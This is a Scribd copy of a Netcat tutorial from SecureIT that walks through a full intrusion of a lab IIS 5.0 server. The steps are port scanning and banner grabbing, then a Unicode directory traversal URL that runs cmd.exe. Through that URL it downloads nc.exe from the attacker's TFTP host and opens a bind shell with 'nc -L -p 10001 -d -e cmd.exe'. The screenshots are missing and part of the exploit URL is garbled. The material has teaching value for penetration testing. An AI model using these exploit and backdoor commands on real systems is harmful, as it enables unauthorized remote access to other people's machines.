Scribd
Upload
75 views

Netcat Tutorial

The document discusses how to use the Netcat tool to perform various security tasks like port scanning, banner grabbing, exploiting vulnerabilities to upload Netcat, using Netcat as a backdoor to get remote command line access, and transferring files between systems. It provides examples of using Netcat to scan for open ports, exploit an IIS server, upload Netcat, create a listening backdoor on a server, connect to it remotely, and transfer a file between systems.

Uploaded by

Astha Shah
Copyright
© © All Rights Reserved
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
75 views

Netcat Tutorial

The document discusses how to use the Netcat tool to perform various security tasks like port scanning, banner grabbing, exploiting vulnerabilities to upload Netcat, using Netcat as a backdoor to get remote command line access, and transferring files between systems. It provides examples of using Netcat to scan for open ports, exploit an IIS server, upload Netcat, create a listening backdoor on a server, connect to it remotely, and transfer a file between systems.

Uploaded by

Astha Shah
Copyright
© © All Rights Reserved
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
You are on page 1/ 10

SECUREIT.CO.

IL

Tutorial

Security Through Hacking

NetCat Tutorial
Straight forward, no nonsense Security tool Tutorials
SECUREIT.CO.IL

SECURITY THROUGH HACKING

NetCat - The Swiss Army


Knife

© SecureIT.co.il

[email protected]

http://www.SecureIT.co.il
SECUREIT.CO.IL
Tutorial

NetCat - The "Swiss Army Knife”

Description
Netcat is a utility that is able to write and read data across TCP and UDP network connections.
If you are responsible for network or system security it essential that you understand the
capabilities of Netcat. Netcat can be used as port scanner, a backdoor, a port redirector, a port
listener and lots of other cool things too. It's not always the best tool for the job, but if I was
stranded on an island, I'd take Netcat with me © During this tutorial I'll demonstrate a complete
hack, using Netcat only, just to point out how versatile it is.
Port scanning with Netcat
A scanning example from Hobbit is "nc -v -w 2 -z target 20-30". Netcat will try connecting to
every port between 20 and 30 [inclusive] at the target, and will likely inform you about an FTP
server, telnet server, and mailer along the way. The -z switch prevents sending any data to a
TCP connection and very limited probe data to a UDP connection, and is thus useful as a fast
scanning mode just to see what ports the target is listening on. To limit scanning speed if
desired, -i will insert a delay between each port probe. Even though Netcat can be used for port
scanning it isn’t its strength. A tool such as Nmap is better suited for port scanning.

We scanned 192.168.1.1, ports 1-200. We can see that among others, port 80, 21 and 25 are
open.
Banner Grabbing with Netcat

So we're interested in knowing what's running behind port 80 and 21. We can use Netcat to grab
port banners in the following way:

So we know it’s probably a Windows 2000 machine as it's running IIS 5.0 and Microsoft FTP
Service.
Let's try to send a malformed URL which attempts to exploit the File Traversal vulnerability in
unpatched IIS servers (Pre SP3). We will be using Netcat to Check for the vulnerability, and if
found (and it will!), we will upload Netcat to the IIS server and demonstrate how we can use
Netcat as a backdoor.
If you do not know what the Unicode File traversal exploit is, you can check the "IIS Unicode
File Traversal" tutorial, or read it up on the net.

1
Basically this exploit allows us to "break out" of C:\inetpub\wwwroot and explore and execute
programs anywhere on the attacked machine.
The point here isn't hacking IIS, but the use of Netcat as a backdoor. Don't get distracted by the
whole "hacking into IIS" thing.

Voila! We've sent the URL:


http://192.168.L90/scripts/..%255c.Vwinnt/system32/cmd.exe?/c+dir+c:\ to the vulnerable
IIS server and what we see is a directory listing of the IIS server C drive. Great! Now we
want to upload Netcat to the IIS server, so we'll use TFTP and integrate the TFTP
commands into the malformed URL.

2
tftp -I 192.168.1.9 GET nc.exe
Is transformed to:
http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe
Also take a note of your TFTP server, to see if it has successfully uploaded the nc.exe file:

Netcat as a BackDoor

So now we have Netcat uploaded to the IIS server, we want to use it to create a backdoor, in
order to get a remote command prompt.
In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS server (lets
choose port 10001) and then we can connect to this port from our attacking machine.. .using
Netcat of course!

The command we want to give on the server looks like this: nc -L -p 10001 -d -e cmd.exe

Here's what that command does:


nc - tells Windows to run the nc.exe file with the following arguments:

-L Tells netcat to not close and wait for connections


-p Specifies a port to listen for a connection on
-d Tells Netcat to detach from the process we want it to run.
-e Tells what program to run once the port is connected to (cmd.exe)

3
If we now want to convert this command for Unicode URL use, it will look like this:

http://<Exploit URL>/c+nc+-L+-p+10001+-d+-e+cmd.exe

Now we will execute Netcat on the remote IIS machine:

This should have started Netcat listening on port 10001 on the IIS machine and should connect
the cmd.exe process to the connection stream. From our machine we will try to connect to the
Netcat on the IIS server.

4
Tada! We have now "Shoveled a Shell" using Netcat. We effectively have a remote
command prompt of the IIS server, as can be seen from the IPConfig.

Transferring files using Netcat

Let's look at other possibilities Netcat can provide. Sat we wanted to transfer a file called
hack.txt to the IIS server, and for some reason we don't want to TFTP the file. We can use
Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination system start Netcat on the IIS server with the
following command:

nc -l -p 1234 >hack.txt

On our source system (the attacking computer) we send a file named hack.txt to the IIS
machine with the following command:

nc destination 1234 <hack.txt

5
Issue a AC on the source system and your done. Be sure to check the file to be sure it is the
same size as the original.

This is what hack.txt looks like

And...Voila!

We can see that the file hack.txt has been transferred to the target system, via port 1234.

These are just a few of the wonderful option Netcat has to offer. Definitely worth RTFMing.
Imagine all the wonderful possibilities of overcoming firewalls with netcat.

The End

6
7

You might also like